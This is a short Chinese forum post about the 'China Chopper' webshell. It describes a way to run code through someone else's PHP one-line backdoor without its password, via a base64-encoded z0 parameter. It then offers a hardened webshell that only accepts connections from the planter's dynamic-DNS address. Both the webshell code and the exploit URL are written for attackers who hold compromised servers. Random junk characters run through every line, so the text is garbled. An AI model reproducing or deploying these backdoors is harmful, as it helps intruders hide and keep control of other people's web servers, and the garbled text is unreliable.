今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞; R% j: K0 S1 ^8 J( C6 q7 ?8 |. j
5 d+ O( \4 j$ C5 [
就算你设置了密码,使用了eval($_REQUEST['moyo']);$ O5 E9 b2 U( f Z, z7 d) A+ w0 P
2 b: N/ m6 ^; W/ i但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门" |+ ~: }5 g, _
3 }0 g6 m7 j. _# J7 {8 j7 y因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));& C4 Q, u5 ^7 \; Q" L% ~6 b1 f/ |
! _% _& n! z) q, } n直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
6 |# |+ y; t+ S: h
$ h+ f4 @& Q5 Q( R' i5 U6 o不知道是设计缺陷还是故意留的后门
7 D* Z7 g4 d* j6 ]- e. ^# e& i( _6 V j; _) w
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用2 J/ h$ n) \- w- ?; [( z
% Y: L7 X/ a/ c本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
4 Q# C1 z2 [/ {1 q
" Y0 O( f$ {0 S4 v8 E* q然后一句话后门这样写* w! P7 G# }4 l' d/ q- ~. l
9 h6 J" B! c2 P ?+ T
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>1 p# |' N0 o5 E0 L' Y- s" ^
这样就可以让一句话后门只允许自己的电脑连接了7 {, \% S" N7 c* M" U( a( h
, q* m5 P2 v& |; c
|